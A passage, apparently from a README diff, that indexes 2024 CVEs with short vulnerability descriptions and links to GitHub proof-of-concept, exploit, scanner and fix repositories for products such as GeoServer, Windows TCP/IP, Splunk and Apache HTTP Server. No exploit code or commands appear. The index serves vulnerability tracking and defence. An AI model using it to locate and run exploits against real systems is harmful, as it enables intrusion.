[julio-cfa/CVE-2024-34832](https://github.com/julio-cfa/CVE-2024-34832) + +### CVE-2024-34833 (2024-06-17) + +Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server. + + +- [ShellUnease/CVE-2024-34833-payroll-management-system-rce](https://github.com/ShellUnease/CVE-2024-34833-payroll-management-system-rce) + +### CVE-2024-34958 (-) + +idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add + + +- [Gr-1m/CVE-2024-34958](https://github.com/Gr-1m/CVE-2024-34958) + +### CVE-2024-35133 (2024-08-29) + +IBM Security Verify Access 10.0.0 through 10.0.8 OIDC Provider could allow a remote authenticated attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. + + +- [Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133](https://github.com/Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133) + +### CVE-2024-35205 (-) + +The WPS Office (aka cn.wps.moffice_eng) application before 17.0.0 for Android fails to properly sanitize file names before processing them through external application interactions, leading to a form of path traversal. This potentially enables any application to dispatch a crafted library file, aiming to overwrite an existing native library utilized by WPS Office. Successful exploitation could result in the execution of arbitrary commands under the guise of WPS Office's application ID. + + +- [cyb3r-w0lf/Dirty_Stream-Android-POC](https://github.com/cyb3r-w0lf/Dirty_Stream-Android-POC) + +### CVE-2024-35242 (2024-06-10) + +Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.\n + + +- [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242) + +### CVE-2024-35250 (2024-06-11) + +Windows Kernel-Mode Driver Elevation of Privilege Vulnerability + + +- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250) +- [ro0tmylove/CVE-2024-35250-BOF](https://github.com/ro0tmylove/CVE-2024-35250-BOF) +- [yinsel/CVE-2024-35250-BOF](https://github.com/yinsel/CVE-2024-35250-BOF) + +### CVE-2024-35315 (2024-10-21) + +A vulnerability in the Desktop Client of Mitel MiCollab through 9.7.1.110, and MiVoice Business Solution Virtual Instance (MiVB SVI) 1.0.0.25, could allow an authenticated attacker to conduct a privilege escalation attack due to improper file validation. A successful exploit could allow an attacker to run arbitrary code with elevated privileges. + + +- [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC) + +### CVE-2024-35333 (-) + +A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption. + + +- [momo1239/CVE-2024-35333](https://github.com/momo1239/CVE-2024-35333) + +### CVE-2024-35468 (-) + +A SQL injection vulnerability in /hrm/index.php in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter. + + +- [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468) + +### CVE-2024-35469 (-) + +A SQL injection vulnerability in /hrm/user/ in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter. + + +- [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469) + +### CVE-2024-35475 (-) + +A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands. + + +- [carsonchan12345/CVE-2024-35475](https://github.com/carsonchan12345/CVE-2024-35475) + +### CVE-2024-35511 (-) + +phpgurukul Men Salon Management System v2.0 is vulnerable to SQL Injection via the "username" parameter of /msms/admin/index.php. + + +- [efekaanakkar/CVE-2024-35511](https://github.com/efekaanakkar/CVE-2024-35511) + +### CVE-2024-35538 (2024-08-19) + +Typecho v1.3.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as value of X-Forwarded-For or Client-Ip headers while performing HTTP requests. + + +- [cyberaz0r/Typecho-Multiple-Vulnerabilities](https://github.com/cyberaz0r/Typecho-Multiple-Vulnerabilities) + +### CVE-2024-35584 (2024-10-15) + +SQL injection vulnerabilities were discovered in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1 to 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from "X-Forwarded-For" header and appends it to a SQL INSERT statement directly, leading to SQL Injection. + + +- [whwhwh96/CVE-2024-35584](https://github.com/whwhwh96/CVE-2024-35584) + +### CVE-2024-36079 (-) + +An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it. + + +- [DxRvs/vaultize_CVE-2024-36079](https://github.com/DxRvs/vaultize_CVE-2024-36079) + +### CVE-2024-36104 (2024-06-04) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14.\n\nUsers are recommended to upgrade to version 18.12.14, which fixes the issue.\n\n + + +- [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104) + +### CVE-2024-36401 (2024-07-01) + +GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n\nThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.\n\nVersions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed. + + +- [bigb0x/CVE-2024-36401](https://github.com/bigb0x/CVE-2024-36401) +- [Niuwoo/CVE-2024-36401](https://github.com/Niuwoo/CVE-2024-36401) +- [RevoltSecurities/CVE-2024-36401](https://github.com/RevoltSecurities/CVE-2024-36401) +- [Mr-xn/CVE-2024-36401](https://github.com/Mr-xn/CVE-2024-36401) +- [jakabakos/CVE-2024-36401-GeoServer-RCE](https://github.com/jakabakos/CVE-2024-36401-GeoServer-RCE) +- [ahisec/geoserver-](https://github.com/ahisec/geoserver-) +- [Chocapikk/CVE-2024-36401](https://github.com/Chocapikk/CVE-2024-36401) +- [yisas93/CVE-2024-36401-PoC](https://github.com/yisas93/CVE-2024-36401-PoC) +- [justin-p/geoexplorer](https://github.com/justin-p/geoexplorer) +- [daniellowrie/CVE-2024-36401-PoC](https://github.com/daniellowrie/CVE-2024-36401-PoC) +- [PunitTailor55/GeoServer-CVE-2024-36401](https://github.com/PunitTailor55/GeoServer-CVE-2024-36401) +- [netuseradministrator/CVE-2024-36401](https://github.com/netuseradministrator/CVE-2024-36401) +- [kkhackz0013/CVE-2024-36401](https://github.com/kkhackz0013/CVE-2024-36401) +- [thestar0/CVE-2024-36401-WoodpeckerPlugin](https://github.com/thestar0/CVE-2024-36401-WoodpeckerPlugin) +- [XiaomingX/cve-2024-36401-poc](https://github.com/XiaomingX/cve-2024-36401-poc) +- [0x0d3ad/CVE-2024-36401](https://github.com/0x0d3ad/CVE-2024-36401) + +### CVE-2024-36416 (2024-06-10) + +SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue. + + +- [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416) + +### CVE-2024-36424 (2024-08-06) + +K7RKScan.sys in K7 Ultimate Security before 17.0.2019 allows local users to cause a denial of service (BSOD) because of a NULL pointer dereference. + + +- [secunnix/CVE-2024-36424](https://github.com/secunnix/CVE-2024-36424) + +### CVE-2024-36527 (2024-06-17) + +puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. + + +- [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527) + +### CVE-2024-36539 (2024-07-24) + +Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token. + + +- [Abdurahmon3236/CVE-2024-36539](https://github.com/Abdurahmon3236/CVE-2024-36539) + +### CVE-2024-36821 (2024-06-11) + +Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root. + + +- [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821) + +### CVE-2024-36823 (-) + +The encrypt() function of Ninja Core v7.0.0 was discovered to use a weak cryptographic algorithm, leading to a possible leakage of sensitive information. + + +- [JAckLosingHeart/CVE-2024-36823-POC](https://github.com/JAckLosingHeart/CVE-2024-36823-POC) + +### CVE-2024-36837 (2024-06-05) + +SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file. + + +- [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837) +- [lhc321-source/CVE-2024-36837](https://github.com/lhc321-source/CVE-2024-36837) + +### CVE-2024-36842 +- [abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-](https://github.com/abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-) + +### CVE-2024-36877 (2024-08-12) + +Micro-Star International Z-series motherboards (Z590, Z490, and Z790) and B-series motherboards (B760, B560, B660, and B460) with firmware 7D25v14, 7D25v17 to 7D25v19, and 7D25v1A to 7D25v1H was discovered to contain a write-what-where condition in the in the SW handler for SMI 0xE3. Motherboard's with the following chipsets are affected: Intel 300, Intel 400, Intel 500, Intel 600, Intel 700, AMD 300, AMD 400, AMD 500, AMD 600 and AMD 700. + + +- [jjensn/CVE-2024-36877](https://github.com/jjensn/CVE-2024-36877) +- [CERTologists/POC-CVE-2024-36877](https://github.com/CERTologists/POC-CVE-2024-36877) + +### CVE-2024-36991 (2024-07-01) + +In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows. + + +- [bigb0x/CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991) +- [Mr-xn/CVE-2024-36991](https://github.com/Mr-xn/CVE-2024-36991) +- [th3gokul/CVE-2024-36991](https://github.com/th3gokul/CVE-2024-36991) +- [sardine-web/CVE-2024-36991](https://github.com/sardine-web/CVE-2024-36991) +- [Cappricio-Securities/CVE-2024-36991](https://github.com/Cappricio-Securities/CVE-2024-36991) + +### CVE-2024-37032 (2024-05-31) + +Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring. + + +- [Bi0x/CVE-2024-37032](https://github.com/Bi0x/CVE-2024-37032) +- [ahboon/CVE-2024-37032-scanner](https://github.com/ahboon/CVE-2024-37032-scanner) + +### CVE-2024-37051 (2024-06-10) + +GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4 + + +- [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP) +- [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051) + +### CVE-2024-37081 (2024-06-18) + +The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. + + +- [mbadanoiu/CVE-2024-37081](https://github.com/mbadanoiu/CVE-2024-37081) +- [Mr-r00t11/CVE-2024-37081](https://github.com/Mr-r00t11/CVE-2024-37081) +- [CERTologists/-CVE-2024-37081-POC](https://github.com/CERTologists/-CVE-2024-37081-POC) +- [CERTologists/Modified-CVE-2024-37081-POC](https://github.com/CERTologists/Modified-CVE-2024-37081-POC) + +### CVE-2024-37084 (2024-07-25) + +In Spring Cloud Data Flow versions prior to 2.11.4,  a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server + + +- [Kayiyan/CVE-2024-37084-Poc](https://github.com/Kayiyan/CVE-2024-37084-Poc) +- [vuhz/CVE-2024-37084](https://github.com/vuhz/CVE-2024-37084) +- [Ly4j/CVE-2024-37084-Exp](https://github.com/Ly4j/CVE-2024-37084-Exp) +- [A0be/CVE-2024-37084-Exp](https://github.com/A0be/CVE-2024-37084-Exp) +- [XiaomingX/cve-2024-37084-Poc](https://github.com/XiaomingX/cve-2024-37084-Poc) + +### CVE-2024-37085 (2024-06-25) + +VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD. + + +- [mahmutaymahmutay/CVE-2024-37085](https://github.com/mahmutaymahmutay/CVE-2024-37085) +- [Florian-Hoth/CVE-2024-37085-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-37085-RCE-POC) +- [WTN-arny/Vmware-ESXI](https://github.com/WTN-arny/Vmware-ESXI) +- [WTN-arny/CVE-2024-37085](https://github.com/WTN-arny/CVE-2024-37085) + +### CVE-2024-37147 (2024-07-10) + +GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. An authenticated user can attach a document to any item, even if the user has no write access on it. Upgrade to 10.0.16. + + +- [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC) + +### CVE-2024-37383 (2024-06-07) + +Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7 allows XSS via SVG animate attributes. + + +- [bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC) +- [amirzargham/CVE-2024-37383-exploit](https://github.com/amirzargham/CVE-2024-37383-exploit) + +### CVE-2024-37393 (2024-06-10) + +Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature. + + +- [optistream/securenvoy-cve-2024-37393](https://github.com/optistream/securenvoy-cve-2024-37393) + +### CVE-2024-37713 +- [fullbbadda1208/CVE-2024-37713](https://github.com/fullbbadda1208/CVE-2024-37713) + +### CVE-2024-37726 (2024-07-03) + +Insecure Permissions vulnerability in Micro-Star International Co., Ltd MSI Center v.2.0.36.0 allows a local attacker to escalate privileges via the Export System Info function in MSI.CentralServer.exe + + +- [carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) +- [NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) + +### CVE-2024-37742 (2024-06-25) + +Insecure Access Control in Safe Exam Browser (SEB) = 3.5.0 on Windows. The vulnerability allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity. By exploiting this flaw, an attacker can bypass exam controls and gain an unfair advantage during exams. + + +- [Eteblue/CVE-2024-37742](https://github.com/Eteblue/CVE-2024-37742) + +### CVE-2024-37759 (2024-06-24) + +DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface. + + +- [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC) + +### CVE-2024-37762 (2024-07-01) + +MachForm up to version 21 is affected by an authenticated unrestricted file upload which leads to a remote code execution. + + +- [Atreb92/cve-2024-37762](https://github.com/Atreb92/cve-2024-37762) + +### CVE-2024-37763 (2024-07-01) + +MachForm up to version 19 is affected by an unauthenticated stored cross-site scripting which affects users with valid sessions whom can view compiled forms results. + + +- [Atreb92/cve-2024-37763](https://github.com/Atreb92/cve-2024-37763) + +### CVE-2024-37764 (2024-07-01) + +MachForm up to version 19 is affected by an authenticated stored cross-site scripting. + + +- [Atreb92/cve-2024-37764](https://github.com/Atreb92/cve-2024-37764) + +### CVE-2024-37765 (2024-07-01) + +Machform up to version 19 is affected by an authenticated Blind SQL injection in the user account settings page. + + +- [Atreb92/cve-2024-37765](https://github.com/Atreb92/cve-2024-37765) + +### CVE-2024-37770 (2024-07-10) + +14Finger v1.1 was discovered to contain a remote command execution (RCE) vulnerability in the fingerprint function. This vulnerability allows attackers to execute arbitrary commands via a crafted payload. + + +- [k3ppf0r/CVE-2024-37770](https://github.com/k3ppf0r/CVE-2024-37770) + +### CVE-2024-37791 (2024-06-18) + +DuxCMS3 v3.1.3 was discovered to contain a SQL injection vulnerability via the keyword parameter at /article/Content/index?class_id. + + +- [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791) + +### CVE-2024-37843 (2024-06-25) + +Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint. + + +- [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC) + +### CVE-2024-37888 (2024-06-14) + +The Open Link is a CKEditor plugin, extending context menu with a possibility to open link in a new tab. The vulnerability allowed to execute JavaScript code by abusing link href attribute. It affects all users using the Open Link plugin at version < **1.0.5**. + + +- [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888) + +### CVE-2024-37889 (2024-06-14) + +MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6. + + +- [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889) + +### CVE-2024-38036 (2024-10-04) + +There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1, 10.8.1 and 10.7.1 which may allow a remote, unauthenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. + + +- [hnytgl/CVE-2024-38036](https://github.com/hnytgl/CVE-2024-38036) + +### CVE-2024-38041 (2024-07-09) + +Windows Kernel Information Disclosure Vulnerability + + +- [varwara/CVE-2024-38041](https://github.com/varwara/CVE-2024-38041) + +### CVE-2024-38063 (2024-08-13) + +Windows TCP/IP Remote Code Execution Vulnerability + + +- [diegoalbuquerque/CVE-2024-38063](https://github.com/diegoalbuquerque/CVE-2024-38063) +- [noradlb1/CVE-2024-38063-VB](https://github.com/noradlb1/CVE-2024-38063-VB) +- [Sachinart/CVE-2024-38063-poc](https://github.com/Sachinart/CVE-2024-38063-poc) +- [p33d/cve-2024-38063](https://github.com/p33d/cve-2024-38063) +- [dweger-scripts/CVE-2024-38063-Remediation](https://github.com/dweger-scripts/CVE-2024-38063-Remediation) +- [almogopp/Disable-IPv6-CVE-2024-38063-Fix](https://github.com/almogopp/Disable-IPv6-CVE-2024-38063-Fix) +- [Th3Tr1ckst3r/CVE-2024-38063](https://github.com/Th3Tr1ckst3r/CVE-2024-38063) +- [haroonawanofficial/CVE-2024-38063-Research-Tool](https://github.com/haroonawanofficial/CVE-2024-38063-Research-Tool) +- [ynwarcs/CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063) +- [patchpoint/CVE-2024-38063](https://github.com/patchpoint/CVE-2024-38063) +- [PumpkinBridge/Windows-CVE-2024-38063](https://github.com/PumpkinBridge/Windows-CVE-2024-38063) +- [zenzue/CVE-2024-38063-POC](https://github.com/zenzue/CVE-2024-38063-POC) +- [AdminPentester/CVE-2024-38063-](https://github.com/AdminPentester/CVE-2024-38063-) +- [ThemeHackers/CVE-2024-38063](https://github.com/ThemeHackers/CVE-2024-38063) +- [KernelKraze/CVE-2024-38063_PoC](https://github.com/KernelKraze/CVE-2024-38063_PoC) +- [ps-interactive/cve-2024-38063](https://github.com/ps-interactive/cve-2024-38063) +- [Brownpanda29/Cve-2024-38063](https://github.com/Brownpanda29/Cve-2024-38063) +- [FrancescoDiSalesGithub/quick-fix-cve-2024-38063](https://github.com/FrancescoDiSalesGithub/quick-fix-cve-2024-38063) +- [Faizan-Khanx/CVE-2024-38063](https://github.com/Faizan-Khanx/CVE-2024-38063) +- [ArenaldyP/CVE-2024-38063-Medium](https://github.com/ArenaldyP/CVE-2024-38063-Medium) +- [lnx-dvlpr/cve-2024-38063](https://github.com/lnx-dvlpr/cve-2024-38063) +- [becrevex/CVE-2024-38063](https://github.com/becrevex/CVE-2024-38063) +- [idkwastaken/CVE-2024-38063](https://github.com/idkwastaken/CVE-2024-38063) +- [thanawee321/CVE-2024-38063](https://github.com/thanawee321/CVE-2024-38063) +- [AliHj98/cve-2024-38063-Anonyvader](https://github.com/AliHj98/cve-2024-38063-Anonyvader) +- [Dragkob/CVE-2024-38063](https://github.com/Dragkob/CVE-2024-38063) +- [selenagomez25/CVE-2024-38063](https://github.com/selenagomez25/CVE-2024-38063) + +### CVE-2024-38077 (2024-07-09) + +Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability + + +- [SecStarBot/CVE-2024-38077-POC](https://github.com/SecStarBot/CVE-2024-38077-POC) +- [qi4L/CVE-2024-38077](https://github.com/qi4L/CVE-2024-38077) +- [Sec-Link/CVE-2024-38077](https://github.com/Sec-Link/CVE-2024-38077) +- [murphysecurity/RDL-detect](https://github.com/murphysecurity/RDL-detect) +- [Wlibang/CVE-2024-38077](https://github.com/Wlibang/CVE-2024-38077) +- [psl-b/CVE-2024-38077-check](https://github.com/psl-b/CVE-2024-38077-check) +- [zhuxi1965/CVE-2024-38077-RDLCheck](https://github.com/zhuxi1965/CVE-2024-38077-RDLCheck) +- [lworld0x00/CVE-2024-38077-notes](https://github.com/lworld0x00/CVE-2024-38077-notes) +- [atlassion/CVE-2024-38077-check](https://github.com/atlassion/CVE-2024-38077-check) +- [BBD-YZZ/fyne-gui](https://github.com/BBD-YZZ/fyne-gui) +- [Destiny0991/check_38077](https://github.com/Destiny0991/check_38077) +- [mrmtwoj/CVE-2024-38077](https://github.com/mrmtwoj/CVE-2024-38077) +- [amfg145/CVE-2024-38077](https://github.com/amfg145/CVE-2024-38077) + +### CVE-2024-38080 (2024-07-09) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [pwndorei/CVE-2024-38080](https://github.com/pwndorei/CVE-2024-38080) + +### CVE-2024-38100 (2024-07-09) + +Windows File Explorer Elevation of Privilege Vulnerability + + +- [Florian-Hoth/CVE-2024-38100-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-38100-RCE-POC) + +### CVE-2024-38124 (2024-10-08) + +Windows Netlogon Elevation of Privilege Vulnerability + + +- [tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468](https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468) + +### CVE-2024-38127 (2024-08-13) + +Windows Hyper-V Elevation of Privilege Vulnerability + + +- [pwndorei/CVE-2024-38127](https://github.com/pwndorei/CVE-2024-38127) + +### CVE-2024-38144 (2024-08-13) + +Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability + + +- [Dor00tkit/CVE-2024-38144](https://github.com/Dor00tkit/CVE-2024-38144) + +### CVE-2024-38189 (2024-08-13) + +Microsoft Project Remote Code Execution Vulnerability + + +- [vx7z/CVE-2024-38189](https://github.com/vx7z/CVE-2024-38189) + +### CVE-2024-38193 (2024-08-13) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [Nephster/CVE-2024-38193](https://github.com/Nephster/CVE-2024-38193) + +### CVE-2024-38200 (2024-08-08) + +Microsoft Office Spoofing Vulnerability + + +- [passtheticket/CVE-2024-38200](https://github.com/passtheticket/CVE-2024-38200) + +### CVE-2024-38366 (2024-07-01) + +trunk.cocoapods.org is the authentication server for the CoacoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used a rfc-822 library which executes a shell command to validate the email domain MX records validity. It works via an DNS MX. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This issue was patched server-side with commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3 in September 2023. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk. + + +- [ReeFSpeK/CocoaPods-RCE_CVE-2024-38366](https://github.com/ReeFSpeK/CocoaPods-RCE_CVE-2024-38366) + +### CVE-2024-38396 (2024-06-16) + +An issue was discovered in iTerm2 3.5.x before 3.5.2. Unfiltered use of an escape sequence to report a window title, in combination with the built-in tmux integration feature (enabled by default), allows an attacker to inject arbitrary code into the terminal, a different vulnerability than CVE-2024-38395. + + +- [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396) + +### CVE-2024-38472 (2024-07-01) + +SSRF in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content \nUsers are recommended to upgrade to version 2.4.60 which fixes this issue.  Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing. + + +- [Abdurahmon3236/CVE-2024-38472](https://github.com/Abdurahmon3236/CVE-2024-38472) +- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing) + +### CVE-2024-38473 (2024-07-01) + +Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.\nUsers are recommended to upgrade to version 2.4.60, which fixes this issue. + + +- [Abdurahmon3236/CVE-2024-38473](https://github.com/Abdurahmon3236/CVE-2024-38473) +- [juanschallibaum/CVE-2024-38473-Nuclei-Template](https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template) + +### CVE-2024-38475 (2024-07-01) + +Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. \n\nSubstitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained. + + +- [p0in7s/CVE-2024-38475](https://github.com/p0in7s/CVE-2024-38475) + +### CVE-2024-38526 (2024-06-25) + +pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1. + + +- [putget/pollypull](https://github.com/putget/pollypull) + +### CVE-2024-38537 (2024-07-02) + +Fides is an open-source privacy engineering platform. `fides.js`, a client-side script used to interact with the consent management features of Fides, used the `polyfill.io` domain in a very limited edge case, when it detected a legacy browser such as IE11 that did not support the fetch standard. Therefore it was possible for users of legacy, pre-2017 browsers who navigate to a page serving `fides.js` to download and execute malicious scripts from the `polyfill.io` domain when the domain was compromised and serving malware. No exploitation of `fides.js` via `polyfill.io` has been identified as of time of publication.\n\nThe vulnerability has been patched in Fides version `2.39.1`. Users are advised to upgrade to this version or later to secure their systems against this threat. On Thursday, June 27, 2024, Cloudflare and Namecheap intervened at a domain level to ensure `polyfill.io` and its subdomains could not resolve to the 